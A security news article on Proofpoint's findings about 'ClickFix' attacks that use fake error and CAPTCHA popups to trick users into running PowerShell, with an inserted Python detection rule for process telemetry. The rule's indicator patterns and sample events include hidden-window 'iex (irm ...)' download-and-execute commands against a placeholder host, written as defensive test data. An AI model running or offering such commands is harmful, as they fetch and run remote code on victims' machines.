Researchers report rise in ‘ClickFix’ social engineering attacks

Technique uses fake error and CAPTCHA popups

Proofpoint researchers have documented a rise in a sophisticated social engineering technique known as “ClickFix”.

ClickFix uses dialogue boxes with fake error messages to trick users into copying, pasting and running malicious scripts on their own computers, bypassing security measures.

The pop-up dialogue boxes appear on fake websites or in malicious files and attachments. On visiting such a site or opening such a file, the user is asked to help fix the error by copying the contents of the error message into PowerShell and running it.

A variant uses fake CAPTCHA popups, pretending to validate users with a “verify you are human” check, which then delivers malware.
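The pattern described above, a user pasting a command into PowerShell from the Run dialog or a console, leaves a characteristic trace in process-creation telemetry (Sysmon Event ID 1 style fields: parent image, image, command line). The following detection logic is an added example and is not code from Proofpoint or the article; the parent-process list, indicator regexes, threshold and sample events are assumptions constructed for illustration.

```python
"""Flag process-creation events that look like a user-pasted ClickFix command:
a PowerShell host started interactively from the shell, with a command line
carrying several download-and-execute or window-hiding indicators."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent_image: str   # e.g. Sysmon ParentImage
    image: str          # e.g. Sysmon Image
    command_line: str   # e.g. Sysmon CommandLine


# Parents a hand-pasted command typically runs under (Run dialog and Terminal
# are children of explorer.exe). Assumed list, tune for your environment.
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "windowsterminal.exe", "powershell.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}

# Named indicator patterns (assumed); order determines the order of the report.
SUSPICIOUS = [
    ("invoke-expression", re.compile(r"\biex\b|invoke-expression", re.I)),
    ("download-cmdlet", re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b", re.I)),
    ("hidden-window", re.compile(r"-(w|window|windowstyle)\s+hidden", re.I)),
    ("encoded-command", re.compile(r"-(e|ec|enc|encodedcommand)\b", re.I)),
    ("url", re.compile(r"https?://", re.I)),
]


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def indicators(cmdline: str) -> list[str]:
    """Names of all indicator patterns present in the command line."""
    return [name for name, rx in SUSPICIOUS if rx.search(cmdline)]


def is_clickfix_like(ev: ProcEvent, threshold: int = 2) -> bool:
    """A shell host, launched from an interactive parent, with >= threshold indicators."""
    return (basename(ev.image) in SHELLS
            and basename(ev.parent_image) in INTERACTIVE_PARENTS
            and len(indicators(ev.command_line)) >= threshold)


def triage(events: list[ProcEvent]) -> list[int]:
    """Indices of events worth an analyst's attention."""
    return [i for i, ev in enumerate(events) if is_clickfix_like(ev)]


SAMPLE_EVENTS = [  # constructed sample telemetry, not real captures
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -w hidden -c "iex (irm http://example.invalid/fix)"'),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell Get-ChildItem C:\\Users"),
    ProcEvent(r"C:\Program Files\Build\build.exe", r"C:\Program Files\PowerShell\7\pwsh.exe",
              'pwsh -c "irm https://example.invalid/pkg | iex"'),
]
```

The third sample carries the same cradle but has a build-tool parent, so it is left to a separate, lower-fidelity rule rather than the ClickFix one; the parent filter is what keeps this check focused on the user-pasted case.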

This initial interaction starts a chain of events in which the victim’s system is infiltrated, with the potential for data exfiltration, further malware downloads or propagation of the malicious code.

In a blog post, Proofpoint’s researchers said that malware associated with ClickFix campaigns includes AsyncRAT, Danabot, DarkGate, Lumma Stealer and NetSupport.

“What’s insidious about this technique is the adversaries are preying on people’s innate desire to be helpful and independent,” the researchers note.

“By providing what appears to be both a problem and a solution, people feel empowered to ‘fix’ the issue themselves without needing to alert their IT team or anyone else, and it bypasses security protections by having the person infect themselves.”

In a recent example, an email warning supposedly from GitHub contained a link to a fake GitHub website, with the attack deploying the open source toolkit reCAPTCHA Phish. “The fake website used the reCAPTCHA Phish and ClickFix social engineering technique to trick users into executing a PowerShell command on their computer,” the researchers write.

Threat actors have been observed using ClickFix against government organisations in Ukraine, but it has also been adopted by financially motivated groups and appears to be becoming more popular.

Its adoption is likely a result of more traditional methods such as infected macros and fake invoices becoming less effective, and malicious documents being automatically blocked by security tools.

The rapid rise of incidents suggests that it is an effective technique for attackers, and organisations should take measures to alert employees about this new form of attack and warn them about the danger signs.